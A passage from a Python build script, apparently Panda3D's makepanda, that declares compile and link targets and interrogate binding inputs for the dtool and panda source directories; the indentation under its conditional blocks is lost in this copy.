TargetAdd('p3dtoolbase_lookup3.obj', opts=OPTS, input='lookup3.c')
TargetAdd('p3dtoolbase_indent.obj', opts=OPTS, input='indent.cxx')
#
# DIRECTORY: dtool/src/dtoolutil/
#
OPTS=['DIR:dtool/src/dtoolutil', 'BUILDING:DTOOL']
TargetAdd('p3dtoolutil_composite1.obj', opts=OPTS, input='p3dtoolutil_composite1.cxx')
TargetAdd('p3dtoolutil_composite2.obj', opts=OPTS, input='p3dtoolutil_composite2.cxx')
if GetTarget() == 'darwin':
TargetAdd('p3dtoolutil_filename_assist.obj', opts=OPTS, input='filename_assist.mm')
#
# DIRECTORY: dtool/metalibs/dtool/
#
OPTS=['DIR:dtool/metalibs/dtool', 'BUILDING:DTOOL']
TargetAdd('p3dtool_dtool.obj', opts=OPTS, input='dtool.cxx')
TargetAdd('libp3dtool.dll', input='p3dtool_dtool.obj')
TargetAdd('libp3dtool.dll', input='p3dtoolutil_composite1.obj')
TargetAdd('libp3dtool.dll', input='p3dtoolutil_composite2.obj')
if GetTarget() == 'darwin':
TargetAdd('libp3dtool.dll', input='p3dtoolutil_filename_assist.obj')
TargetAdd('libp3dtool.dll', input='p3dtoolbase_composite1.obj')
TargetAdd('libp3dtool.dll', input='p3dtoolbase_composite2.obj')
TargetAdd('libp3dtool.dll', input='p3dtoolbase_indent.obj')
TargetAdd('libp3dtool.dll', input='p3dtoolbase_lookup3.obj')
TargetAdd('libp3dtool.dll', opts=['ADVAPI','WINSHELL','WINKERNEL'])
#
# DIRECTORY: dtool/src/cppparser/
#
if (not RUNTIME):
OPTS=['DIR:dtool/src/cppparser', 'BISONPREFIX_cppyy']
CreateFile(GetOutputDir()+"/include/cppBison.h")
TargetAdd('p3cppParser_cppBison.obj', opts=OPTS, input='cppBison.yxx')
TargetAdd('cppBison.h', input='p3cppParser_cppBison.obj', opts=['DEPENDENCYONLY'])
TargetAdd('p3cppParser_composite1.obj', opts=OPTS, input='p3cppParser_composite1.cxx')
TargetAdd('p3cppParser_composite2.obj', opts=OPTS, input='p3cppParser_composite2.cxx')
TargetAdd('libp3cppParser.ilb', input='p3cppParser_composite1.obj')
TargetAdd('libp3cppParser.ilb', input='p3cppParser_composite2.obj')
TargetAdd('libp3cppParser.ilb', input='p3cppParser_cppBison.obj')
#
# DIRECTORY: dtool/src/prc/
#
OPTS=['DIR:dtool/src/prc', 'BUILDING:DTOOLCONFIG', 'OPENSSL']
TargetAdd('p3prc_composite1.obj', opts=OPTS, input='p3prc_composite1.cxx')
TargetAdd('p3prc_composite2.obj', opts=OPTS, input='p3prc_composite2.cxx')
#
# DIRECTORY: dtool/src/dconfig/
#
OPTS=['DIR:dtool/src/dconfig', 'BUILDING:DTOOLCONFIG']
TargetAdd('p3dconfig_composite1.obj', opts=OPTS, input='p3dconfig_composite1.cxx')
#
# DIRECTORY: dtool/metalibs/dtoolconfig/
#
OPTS=['DIR:dtool/metalibs/dtoolconfig', 'BUILDING:DTOOLCONFIG']
TargetAdd('p3dtoolconfig_dtoolconfig.obj', opts=OPTS, input='dtoolconfig.cxx')
TargetAdd('libp3dtoolconfig.dll', input='p3dtoolconfig_dtoolconfig.obj')
TargetAdd('libp3dtoolconfig.dll', input='p3dconfig_composite1.obj')
TargetAdd('libp3dtoolconfig.dll', input='p3prc_composite1.obj')
TargetAdd('libp3dtoolconfig.dll', input='p3prc_composite2.obj')
TargetAdd('libp3dtoolconfig.dll', input='libp3dtool.dll')
TargetAdd('libp3dtoolconfig.dll', opts=['ADVAPI', 'OPENSSL', 'WINGDI', 'WINUSER'])
#
# DIRECTORY: dtool/src/interrogatedb/
#
OPTS=['DIR:dtool/src/interrogatedb', 'BUILDING:INTERROGATEDB', 'PYTHON']
TargetAdd('p3interrogatedb_composite1.obj', opts=OPTS, input='p3interrogatedb_composite1.cxx')
TargetAdd('p3interrogatedb_composite2.obj', opts=OPTS, input='p3interrogatedb_composite2.cxx')
TargetAdd('libp3interrogatedb.dll', input='p3interrogatedb_composite1.obj')
TargetAdd('libp3interrogatedb.dll', input='p3interrogatedb_composite2.obj')
TargetAdd('libp3interrogatedb.dll', input='libp3dtool.dll')
TargetAdd('libp3interrogatedb.dll', input='libp3dtoolconfig.dll')
TargetAdd('libp3interrogatedb.dll', opts=['PYTHON'])
if not PkgSkip("PYTHON"):
# This used to be called dtoolconfig.pyd, but it just contains the interrogatedb
# stuff, so it has been renamed appropriately.
OPTS=['DIR:dtool/metalibs/dtoolconfig', 'PYTHON']
TargetAdd('interrogatedb_pydtool.obj', opts=OPTS, input="pydtool.cxx")
TargetAdd('interrogatedb.pyd', input='interrogatedb_pydtool.obj')
TargetAdd('interrogatedb.pyd', input='libp3dtool.dll')
TargetAdd('interrogatedb.pyd', input='libp3dtoolconfig.dll')
TargetAdd('interrogatedb.pyd', input='libp3interrogatedb.dll')
TargetAdd('interrogatedb.pyd', opts=['PYTHON'])
#
# DIRECTORY: dtool/src/pystub/
#
if not RUNTIME and not RTDIST:
OPTS=['DIR:dtool/src/pystub']
TargetAdd('p3pystub_pystub.obj', opts=OPTS, input='pystub.cxx')
TargetAdd('libp3pystub.lib', input='p3pystub_pystub.obj')
#TargetAdd('libp3pystub.lib', input='libp3dtool.dll')
TargetAdd('libp3pystub.lib', opts=['ADVAPI'])
#
# DIRECTORY: dtool/src/interrogate/
#
if (not RUNTIME):
OPTS=['DIR:dtool/src/interrogate', 'DIR:dtool/src/cppparser', 'DIR:dtool/src/interrogatedb']
TargetAdd('interrogate_composite1.obj', opts=OPTS, input='interrogate_composite1.cxx')
TargetAdd('interrogate_composite2.obj', opts=OPTS, input='interrogate_composite2.cxx')
TargetAdd('interrogate.exe', input='interrogate_composite1.obj')
TargetAdd('interrogate.exe', input='interrogate_composite2.obj')
TargetAdd('interrogate.exe', input='libp3cppParser.ilb')
TargetAdd('interrogate.exe', input=COMMON_DTOOL_LIBS)
TargetAdd('interrogate.exe', input='libp3interrogatedb.dll')
TargetAdd('interrogate.exe', input='libp3pystub.lib')
TargetAdd('interrogate.exe', opts=['ADVAPI', 'OPENSSL', 'WINSHELL', 'WINGDI', 'WINUSER'])
TargetAdd('interrogate_module_interrogate_module.obj', opts=OPTS, input='interrogate_module.cxx')
TargetAdd('interrogate_module.exe', input='interrogate_module_interrogate_module.obj')
TargetAdd('interrogate_module.exe', input='libp3cppParser.ilb')
TargetAdd('interrogate_module.exe', input=COMMON_DTOOL_LIBS)
TargetAdd('interrogate_module.exe', input='libp3interrogatedb.dll')
TargetAdd('interrogate_module.exe', input='libp3pystub.lib')
TargetAdd('interrogate_module.exe', opts=['ADVAPI', 'OPENSSL', 'WINSHELL', 'WINGDI', 'WINUSER'])
if (not RTDIST):
TargetAdd('parse_file_parse_file.obj', opts=OPTS, input='parse_file.cxx')
TargetAdd('parse_file.exe', input='parse_file_parse_file.obj')
TargetAdd('parse_file.exe', input='libp3cppParser.ilb')
TargetAdd('parse_file.exe', input=COMMON_DTOOL_LIBS)
TargetAdd('parse_file.exe', input='libp3interrogatedb.dll')
TargetAdd('parse_file.exe', input='libp3pystub.lib')
TargetAdd('parse_file.exe', opts=['ADVAPI', 'OPENSSL', 'WINSHELL', 'WINGDI', 'WINUSER'])
#
# DIRECTORY: dtool/src/prckeys/
#
if (PkgSkip("OPENSSL")==0 and not RUNTIME and not RTDIST):
OPTS=['DIR:dtool/src/prckeys', 'OPENSSL']
TargetAdd('make-prc-key_makePrcKey.obj', opts=OPTS, input='makePrcKey.cxx')
TargetAdd('make-prc-key.exe', input='make-prc-key_makePrcKey.obj')
TargetAdd('make-prc-key.exe', input=COMMON_DTOOL_LIBS)
TargetAdd('make-prc-key.exe', opts=['ADVAPI', 'OPENSSL', 'WINSHELL', 'WINGDI', 'WINUSER'])
#
# DIRECTORY: dtool/src/test_interrogate/
#
if (not RTDIST and not RUNTIME):
OPTS=['DIR:dtool/src/test_interrogate']
TargetAdd('test_interrogate_test_interrogate.obj', opts=OPTS, input='test_interrogate.cxx')
TargetAdd('test_interrogate.exe', input='test_interrogate_test_interrogate.obj')
TargetAdd('test_interrogate.exe', input='libp3interrogatedb.dll')
TargetAdd('test_interrogate.exe', input=COMMON_DTOOL_LIBS)
TargetAdd('test_interrogate.exe', input='libp3pystub.lib')
TargetAdd('test_interrogate.exe', opts=['ADVAPI', 'OPENSSL', 'WINSHELL', 'WINGDI', 'WINUSER'])
#
# DIRECTORY: dtool/src/dtoolbase/
#
OPTS=['DIR:dtool/src/dtoolbase', 'PYTHON']
IGATEFILES=GetDirectoryContents('dtool/src/dtoolbase', ["*_composite*.cxx"])
IGATEFILES += [
"typeHandle.h",
"typeHandle_ext.h",
"typeRegistry.h",
"typedObject.h",
"neverFreeMemory.h",
]
TargetAdd('libp3dtoolbase.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3dtoolbase.in', opts=['IMOD:panda3d.core', 'ILIB:libp3dtoolbase', 'SRCDIR:dtool/src/dtoolbase'])
TargetAdd('libp3dtoolbase_igate.obj', input='libp3dtoolbase.in', opts=["DEPENDENCYONLY"])
TargetAdd('p3dtoolbase_typeHandle_ext.obj', opts=OPTS, input='typeHandle_ext.cxx')
#
# DIRECTORY: dtool/src/dtoolutil/
#
OPTS=['DIR:dtool/src/dtoolutil', 'PYTHON']
IGATEFILES=GetDirectoryContents('dtool/src/dtoolutil', ["*_composite*.cxx"])
IGATEFILES += [
"config_dtoolutil.h",
"pandaSystem.h",
"dSearchPath.h",
"executionEnvironment.h",
"textEncoder.h",
"filename.h",
"filename_ext.h",
"globPattern.h",
"globPattern_ext.h",
"pandaFileStream.h",
"lineStream.h",
]
TargetAdd('libp3dtoolutil.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3dtoolutil.in', opts=['IMOD:panda3d.core', 'ILIB:libp3dtoolutil', 'SRCDIR:dtool/src/dtoolutil'])
TargetAdd('libp3dtoolutil_igate.obj', input='libp3dtoolutil.in', opts=["DEPENDENCYONLY"])
TargetAdd('p3dtoolutil_ext_composite.obj', opts=OPTS, input='p3dtoolutil_ext_composite.cxx')
#
# DIRECTORY: dtool/src/prc/
#
OPTS=['DIR:dtool/src/prc', 'PYTHON']
IGATEFILES=GetDirectoryContents('dtool/src/prc', ["*.h", "*_composite*.cxx"])
TargetAdd('libp3prc.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3prc.in', opts=['IMOD:panda3d.core', 'ILIB:libp3prc', 'SRCDIR:dtool/src/prc'])
TargetAdd('libp3prc_igate.obj', input='libp3prc.in', opts=["DEPENDENCYONLY"])
TargetAdd('p3prc_ext_composite.obj', opts=OPTS, input='p3prc_ext_composite.cxx')
#
# DIRECTORY: panda/src/pandabase/
#
OPTS=['DIR:panda/src/pandabase', 'BUILDING:PANDAEXPRESS']
TargetAdd('p3pandabase_pandabase.obj', opts=OPTS, input='pandabase.cxx')
#
# DIRECTORY: panda/src/express/
#
OPTS=['DIR:panda/src/express', 'BUILDING:PANDAEXPRESS', 'OPENSSL', 'ZLIB']
TargetAdd('p3express_composite1.obj', opts=OPTS, input='p3express_composite1.cxx')
TargetAdd('p3express_composite2.obj', opts=OPTS, input='p3express_composite2.cxx')
OPTS=['DIR:panda/src/express', 'OPENSSL', 'ZLIB', 'PYTHON']
IGATEFILES=GetDirectoryContents('panda/src/express', ["*.h", "*_composite*.cxx"])
TargetAdd('libp3express.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3express.in', opts=['IMOD:panda3d.core', 'ILIB:libp3express', 'SRCDIR:panda/src/express'])
TargetAdd('libp3express_igate.obj', input='libp3express.in', opts=["DEPENDENCYONLY"])
TargetAdd('p3express_ext_composite.obj', opts=OPTS, input='p3express_ext_composite.cxx')
#
# DIRECTORY: panda/src/downloader/
#
OPTS=['DIR:panda/src/downloader', 'BUILDING:PANDAEXPRESS', 'OPENSSL', 'ZLIB']
TargetAdd('p3downloader_composite1.obj', opts=OPTS, input='p3downloader_composite1.cxx')
TargetAdd('p3downloader_composite2.obj', opts=OPTS, input='p3downloader_composite2.cxx')
OPTS=['DIR:panda/src/downloader', 'OPENSSL', 'ZLIB', 'PYTHON']
IGATEFILES=GetDirectoryContents('panda/src/downloader', ["*.h", "*_composite*.cxx"])
TargetAdd('libp3downloader.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3downloader.in', opts=['IMOD:panda3d.core', 'ILIB:libp3downloader', 'SRCDIR:panda/src/downloader'])
TargetAdd('libp3downloader_igate.obj', input='libp3downloader.in', opts=["DEPENDENCYONLY"])
TargetAdd('p3downloader_stringStream_ext.obj', opts=OPTS, input='stringStream_ext.cxx')
#
# DIRECTORY: panda/metalibs/pandaexpress/
#
OPTS=['DIR:panda/metalibs/pandaexpress', 'BUILDING:PANDAEXPRESS', 'ZLIB']
TargetAdd('pandaexpress_pandaexpress.obj', opts=OPTS, input='pandaexpress.cxx')
TargetAdd('libpandaexpress.dll', input='pandaexpress_pandaexpress.obj')
TargetAdd('libpandaexpress.dll', input='p3downloader_composite1.obj')
TargetAdd('libpandaexpress.dll', input='p3downloader_composite2.obj')
TargetAdd('libpandaexpress.dll', input='p3express_composite1.obj')
TargetAdd('libpandaexpress.dll', input='p3express_composite2.obj')
TargetAdd('libpandaexpress.dll', input='p3pandabase_pandabase.obj')
TargetAdd('libpandaexpress.dll', input=COMMON_DTOOL_LIBS)
TargetAdd('libpandaexpress.dll', opts=['ADVAPI', 'WINSOCK2', 'OPENSSL', 'ZLIB', 'WINGDI', 'WINUSER', 'ANDROID'])
#
# DIRECTORY: panda/src/pipeline/
#
if (not RUNTIME):
OPTS=['DIR:panda/src/pipeline', 'BUILDING:PANDA']
TargetAdd('p3pipeline_composite1.obj', opts=OPTS, input='p3pipeline_composite1.cxx')
TargetAdd('p3pipeline_composite2.obj', opts=OPTS, input='p3pipeline_composite2.cxx')
TargetAdd('p3pipeline_contextSwitch.obj', opts=OPTS, input='contextSwitch.c')
OPTS=['DIR:panda/src/pipeline', 'PYTHON']
IGATEFILES=GetDirectoryContents('panda/src/pipeline', ["*.h", "*_composite*.cxx"])
TargetAdd('libp3pipeline.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3pipeline.in', opts=['IMOD:panda3d.core', 'ILIB:libp3pipeline', 'SRCDIR:panda/src/pipeline'])
TargetAdd('libp3pipeline_igate.obj', input='libp3pipeline.in', opts=["DEPENDENCYONLY"])
TargetAdd('p3pipeline_pythonThread.obj', opts=OPTS, input='pythonThread.cxx')
#
# DIRECTORY: panda/src/linmath/
#
if (not RUNTIME):
OPTS=['DIR:panda/src/linmath', 'BUILDING:PANDA']
TargetAdd('p3linmath_composite1.obj', opts=OPTS, input='p3linmath_composite1.cxx')
TargetAdd('p3linmath_composite2.obj', opts=OPTS, input='p3linmath_composite2.cxx')
OPTS=['DIR:panda/src/linmath', 'PYTHON']
IGATEFILES=GetDirectoryContents('panda/src/linmath', ["*.h", "*_composite*.cxx"])
for ifile in IGATEFILES[:]:
if "_src." in ifile:
IGATEFILES.remove(ifile)
IGATEFILES.remove('cast_to_double.h')
IGATEFILES.remove('lmat_ops.h')
IGATEFILES.remove('cast_to_float.h')
TargetAdd('libp3linmath.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3linmath.in', opts=['IMOD:panda3d.core', 'ILIB:libp3linmath', 'SRCDIR:panda/src/linmath'])
TargetAdd('libp3linmath_igate.obj', input='libp3linmath.in', opts=["DEPENDENCYONLY"])
#
# DIRECTORY: panda/src/putil/
#
if (not RUNTIME):
OPTS=['DIR:panda/src/putil', 'BUILDING:PANDA', 'ZLIB']
TargetAdd('p3putil_composite1.obj', opts=OPTS, input='p3putil_composite1.cxx')
TargetAdd('p3putil_composite2.obj', opts=OPTS, input='p3putil_composite2.cxx')
OPTS=['DIR:panda/src/putil', 'ZLIB', 'PYTHON']
IGATEFILES=GetDirectoryContents('panda/src/putil', ["*.h", "*_composite*.cxx"])
IGATEFILES.remove("test_bam.h")
IGATEFILES.remove("config_util.h")
TargetAdd('libp3putil.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3putil.in', opts=['IMOD:panda3d.core', 'ILIB:libp3putil', 'SRCDIR:panda/src/putil'])
TargetAdd('libp3putil_igate.obj', input='libp3putil.in', opts=["DEPENDENCYONLY"])
TargetAdd('p3putil_ext_composite.obj', opts=OPTS, input='p3putil_ext_composite.cxx')
#
# DIRECTORY: panda/src/audio/
#
if (not RUNTIME):
OPTS=['DIR:panda/src/audio', 'BUILDING:PANDA']
TargetAdd('p3audio_composite1.obj', opts=OPTS, input='p3audio_composite1.cxx')
OPTS=['DIR:panda/src/audio', 'PYTHON']
IGATEFILES=["audio.h"]
TargetAdd('libp3audio.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3audio.in', opts=['IMOD:panda3d.core', 'ILIB:libp3audio', 'SRCDIR:panda/src/audio'])
TargetAdd('libp3audio_igate.obj', input='libp3audio.in', opts=["DEPENDENCYONLY"])
#
# DIRECTORY: panda/src/event/
#
if (not RUNTIME):
OPTS=['DIR:panda/src/event', 'BUILDING:PANDA']
TargetAdd('p3event_composite1.obj', opts=OPTS, input='p3event_composite1.cxx')
TargetAdd('p3event_composite2.obj', opts=OPTS, input='p3event_composite2.cxx')
OPTS=['DIR:panda/src/event', 'PYTHON']
TargetAdd('p3event_asyncFuture_ext.obj', opts=OPTS, input='asyncFuture_ext.cxx')
TargetAdd('p3event_pythonTask.obj', opts=OPTS, input='pythonTask.cxx')
IGATEFILES=GetDirectoryContents('panda/src/event', ["*.h", "*_composite*.cxx"])
TargetAdd('libp3event.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3event.in', opts=['IMOD:panda3d.core', 'ILIB:libp3event', 'SRCDIR:panda/src/event'])
TargetAdd('libp3event_igate.obj', input='libp3event.in', opts=["DEPENDENCYONLY"])
#
# DIRECTORY: panda/src/mathutil/
#
if (not RUNTIME):
OPTS=['DIR:panda/src/mathutil', 'BUILDING:PANDA', 'FFTW']
TargetAdd('p3mathutil_composite1.obj', opts=OPTS, input='p3mathutil_composite1.cxx')
TargetAdd('p3mathutil_composite2.obj', opts=OPTS, input='p3mathutil_composite2.cxx')
OPTS=['DIR:panda/src/mathutil', 'FFTW', 'PYTHON']
IGATEFILES=GetDirectoryContents('panda/src/mathutil', ["*.h", "*_composite*.cxx"])
for ifile in IGATEFILES[:]:
if "_src." in ifile:
IGATEFILES.remove(ifile)
TargetAdd('libp3mathutil.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3mathutil.in', opts=['IMOD:panda3d.core', 'ILIB:libp3mathutil', 'SRCDIR:panda/src/mathutil'])
TargetAdd('libp3mathutil_igate.obj', input='libp3mathutil.in', opts=["DEPENDENCYONLY"])
#
# DIRECTORY: panda/src/gsgbase/
#
if (not RUNTIME):
OPTS=['DIR:panda/src/gsgbase', 'BUILDING:PANDA']
TargetAdd('p3gsgbase_composite1.obj', opts=OPTS, input='p3gsgbase_composite1.cxx')
OPTS=['DIR:panda/src/gsgbase', 'PYTHON']
IGATEFILES=GetDirectoryContents('panda/src/gsgbase', ["*.h", "*_composite*.cxx"])
TargetAdd('libp3gsgbase.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3gsgbase.in', opts=['IMOD:panda3d.core', 'ILIB:libp3gsgbase', 'SRCDIR:panda/src/gsgbase'])
TargetAdd('libp3gsgbase_igate.obj', input='libp3gsgbase.in', opts=["DEPENDENCYONLY"])
#
# DIRECTORY: panda/src/pnmimage/
#
if (not RUNTIME):
OPTS=['DIR:panda/src/pnmimage', 'BUILDING:PANDA', 'ZLIB']
TargetAdd('p3pnmimage_composite1.obj', opts=OPTS, input='p3pnmimage_composite1.cxx')
TargetAdd('p3pnmimage_composite2.obj', opts=OPTS, input='p3pnmimage_composite2.cxx')
TargetAdd('p3pnmimage_convert_srgb_sse2.obj', opts=OPTS+['SSE2'], input='convert_srgb_sse2.cxx')
OPTS=['DIR:panda/src/pnmimage', 'ZLIB', 'PYTHON']
IGATEFILES=GetDirectoryContents('panda/src/pnmimage', ["*.h", "*_composite*.cxx"])
TargetAdd('libp3pnmimage.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3pnmimage.in', opts=['IMOD:panda3d.core', 'ILIB:libp3pnmimage', 'SRCDIR:panda/src/pnmimage'])
TargetAdd('libp3pnmimage_igate.obj', input='libp3pnmimage.in', opts=["DEPENDENCYONLY"])
TargetAdd('p3pnmimage_pfmFile_ext.obj', opts=OPTS, input='pfmFile_ext.cxx')
#
# DIRECTORY: panda/src/nativenet/
#
if (not RUNTIME):
OPTS=['DIR:panda/src/nativenet', 'OPENSSL', 'BUILDING:PANDA']
TargetAdd('p3nativenet_composite1.obj', opts=OPTS, input='p3nativenet_composite1.cxx')
OPTS=['DIR:panda/src/nativenet', 'OPENSSL', 'PYTHON']
IGATEFILES=GetDirectoryContents('panda/src/nativenet', ["*.h", "*_composite*.cxx"])
TargetAdd('libp3nativenet.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3nativenet.in', opts=['IMOD:panda3d.core', 'ILIB:libp3nativenet', 'SRCDIR:panda/src/nativenet'])
TargetAdd('libp3nativenet_igate.obj', input='libp3nativenet.in', opts=["DEPENDENCYONLY"])
#
# DIRECTORY: panda/src/net/
#
if (not RUNTIME):
OPTS=['DIR:panda/src/net', 'BUILDING:PANDA']
TargetAdd('p3net_composite1.obj', opts=OPTS, input='p3net_composite1.cxx')
TargetAdd('p3net_composite2.obj', opts=OPTS, input='p3net_composite2.cxx')
OPTS=['DIR:panda/src/net', 'PYTHON']
IGATEFILES=GetDirectoryContents('panda/src/net', ["*.h", "*_composite*.cxx"])
IGATEFILES.remove("datagram_ui.h")
TargetAdd('libp3net.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3net.in', opts=['IMOD:panda3d.core', 'ILIB:libp3net', 'SRCDIR:panda/src/net'])
TargetAdd('libp3net_igate.obj', input='libp3net.in', opts=["DEPENDENCYONLY"])
#
# DIRECTORY: panda/src/pstatclient/
#
if (not RUNTIME):
OPTS=['DIR:panda/src/pstatclient', 'BUILDING:PANDA']
TargetAdd('p3pstatclient_composite1.obj', opts=OPTS, input='p3pstatclient_composite1.cxx')
TargetAdd('p3pstatclient_composite2.obj', opts=OPTS, input='p3pstatclient_composite2.cxx')
OPTS=['DIR:panda/src/pstatclient', 'PYTHON']
IGATEFILES=GetDirectoryContents('panda/src/pstatclient', ["*.h", "*_composite*.cxx"])
IGATEFILES.remove("config_pstats.h")
TargetAdd('libp3pstatclient.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3pstatclient.in', opts=['IMOD:panda3d.core', 'ILIB:libp3pstatclient', 'SRCDIR:panda/src/pstatclient'])
TargetAdd('libp3pstatclient_igate.obj', input='libp3pstatclient.in', opts=["DEPENDENCYONLY"])
#
# DIRECTORY: panda/src/gobj/
#
if (not RUNTIME):
OPTS=['DIR:panda/src/gobj', 'BUILDING:PANDA', 'NVIDIACG', 'ZLIB', 'SQUISH']
TargetAdd('p3gobj_composite1.obj', opts=OPTS, input='p3gobj_composite1.cxx')
TargetAdd('p3gobj_composite2.obj', opts=OPTS, input='p3gobj_composite2.cxx')
OPTS=['DIR:panda/src/gobj', 'NVIDIACG', 'ZLIB', 'SQUISH', 'PYTHON']
IGATEFILES=GetDirectoryContents('panda/src/gobj', ["*.h", "*_composite*.cxx"])
if ("cgfx_states.h" in IGATEFILES): IGATEFILES.remove("cgfx_states.h")
TargetAdd('libp3gobj.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3gobj.in', opts=['IMOD:panda3d.core', 'ILIB:libp3gobj', 'SRCDIR:panda/src/gobj'])
TargetAdd('libp3gobj_igate.obj', input='libp3gobj.in', opts=["DEPENDENCYONLY"])
TargetAdd('p3gobj_ext_composite.obj', opts=OPTS, input='p3gobj_ext_composite.cxx')
#
# DIRECTORY: panda/src/pgraphnodes/
#
if (not RUNTIME):
OPTS=['DIR:panda/src/pgraphnodes', 'BUILDING:PANDA']
TargetAdd('p3pgraphnodes_composite1.obj', opts=OPTS, input='p3pgraphnodes_composite1.cxx')
TargetAdd('p3pgraphnodes_composite2.obj', opts=OPTS, input='p3pgraphnodes_composite2.cxx')
OPTS=['DIR:panda/src/pgraphnodes', 'PYTHON']
IGATEFILES=GetDirectoryContents('panda/src/pgraphnodes', ["*.h", "*_composite*.cxx"])
TargetAdd('libp3pgraphnodes.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3pgraphnodes.in', opts=['IMOD:panda3d.core', 'ILIB:libp3pgraphnodes', 'SRCDIR:panda/src/pgraphnodes'])
TargetAdd('libp3pgraphnodes_igate.obj', input='libp3pgraphnodes.in', opts=["DEPENDENCYONLY"])
#
# DIRECTORY: panda/src/pgraph/
#
if (not RUNTIME):
OPTS=['DIR:panda/src/pgraph', 'BUILDING:PANDA']
TargetAdd('p3pgraph_nodePath.obj', opts=OPTS, input='nodePath.cxx')
TargetAdd('p3pgraph_composite1.obj', opts=OPTS, input='p3pgraph_composite1.cxx')
TargetAdd('p3pgraph_composite2.obj', opts=OPTS, input='p3pgraph_composite2.cxx')
TargetAdd('p3pgraph_composite3.obj', opts=OPTS, input='p3pgraph_composite3.cxx')
TargetAdd('p3pgraph_composite4.obj', opts=OPTS, input='p3pgraph_composite4.cxx')
OPTS=['DIR:panda/src/pgraph', 'PYTHON']
IGATEFILES=GetDirectoryContents('panda/src/pgraph', ["*.h", "nodePath.cxx", "*_composite*.cxx"])
TargetAdd('libp3pgraph.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3pgraph.in', opts=['IMOD:panda3d.core', 'ILIB:libp3pgraph', 'SRCDIR:panda/src/pgraph'])
TargetAdd('libp3pgraph_igate.obj', input='libp3pgraph.in', opts=["DEPENDENCYONLY","BIGOBJ"])
TargetAdd('p3pgraph_ext_composite.obj', opts=OPTS, input='p3pgraph_ext_composite.cxx')
#
# DIRECTORY: panda/src/cull/
#
if (not RUNTIME):
OPTS=['DIR:panda/src/cull', 'BUILDING:PANDA']
TargetAdd('p3cull_composite1.obj', opts=OPTS, input='p3cull_composite1.cxx')
TargetAdd('p3cull_composite2.obj', opts=OPTS, input='p3cull_composite2.cxx')
OPTS=['DIR:panda/src/cull', 'PYTHON']
IGATEFILES=GetDirectoryContents('panda/src/cull', ["*.h", "*_composite*.cxx"])
TargetAdd('libp3cull.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3cull.in', opts=['IMOD:panda3d.core', 'ILIB:libp3cull', 'SRCDIR:panda/src/cull'])
TargetAdd('libp3cull_igate.obj', input='libp3cull.in', opts=["DEPENDENCYONLY"])
#
# DIRECTORY: panda/src/chan/
#
if (not RUNTIME):
OPTS=['DIR:panda/src/chan', 'BUILDING:PANDA']
TargetAdd('p3chan_composite1.obj', opts=OPTS, input='p3chan_composite1.cxx')
TargetAdd('p3chan_composite2.obj', opts=OPTS, input='p3chan_composite2.cxx')
OPTS=['DIR:panda/src/chan', 'PYTHON']
IGATEFILES=GetDirectoryContents('panda/src/chan', ["*.h", "*_composite*.cxx"])
IGATEFILES.remove('movingPart.h')
IGATEFILES.remove('animChannelFixed.h')
TargetAdd('libp3chan.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3chan.in', opts=['IMOD:panda3d.core', 'ILIB:libp3chan', 'SRCDIR:panda/src/chan'])
TargetAdd('libp3chan_igate.obj', input='libp3chan.in', opts=["DEPENDENCYONLY"])
# DIRECTORY: panda/src/char/
#
if (not RUNTIME):
OPTS=['DIR:panda/src/char', 'BUILDING:PANDA']
TargetAdd('p3char_composite1.obj', opts=OPTS, input='p3char_composite1.cxx')
TargetAdd('p3char_composite2.obj', opts=OPTS, input='p3char_composite2.cxx')
OPTS=['DIR:panda/src/char', 'PYTHON']
IGATEFILES=GetDirectoryContents('panda/src/char', ["*.h", "*_composite*.cxx"])
TargetAdd('libp3char.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3char.in', opts=['IMOD:panda3d.core', 'ILIB:libp3char', 'SRCDIR:panda/src/char'])
TargetAdd('libp3char_igate.obj', input='libp3char.in', opts=["DEPENDENCYONLY"])
#
# DIRECTORY: panda/src/dgraph/
#
if (not RUNTIME):
OPTS=['DIR:panda/src/dgraph', 'BUILDING:PANDA']
TargetAdd('p3dgraph_composite1.obj', opts=OPTS, input='p3dgraph_composite1.cxx')
TargetAdd('p3dgraph_composite2.obj', opts=OPTS, input='p3dgraph_composite2.cxx')
OPTS=['DIR:panda/src/dgraph', 'PYTHON']
IGATEFILES=GetDirectoryContents('panda/src/dgraph', ["*.h", "*_composite*.cxx"])
TargetAdd('libp3dgraph.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3dgraph.in', opts=['IMOD:panda3d.core', 'ILIB:libp3dgraph', 'SRCDIR:panda/src/dgraph'])
TargetAdd('libp3dgraph_igate.obj', input='libp3dgraph.in', opts=["DEPENDENCYONLY"])
#
# DIRECTORY: panda/src/display/
#
if (not RUNTIME):
OPTS=['DIR:panda/src/display', 'BUILDING:PANDA']
TargetAdd('p3display_composite1.obj', opts=OPTS, input='p3display_composite1.cxx')
TargetAdd('p3display_composite2.obj', opts=OPTS, input='p3display_composite2.cxx')
OPTS=['DIR:panda/src/display', 'PYTHON']
IGATEFILES=GetDirectoryContents('panda/src/display', ["*.h", "*_composite*.cxx"])
IGATEFILES.remove("renderBuffer.h")
TargetAdd('libp3display.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3display.in', opts=['IMOD:panda3d.core', 'ILIB:libp3display', 'SRCDIR:panda/src/display'])
TargetAdd('libp3display_igate.obj', input='libp3display.in', opts=["DEPENDENCYONLY"])
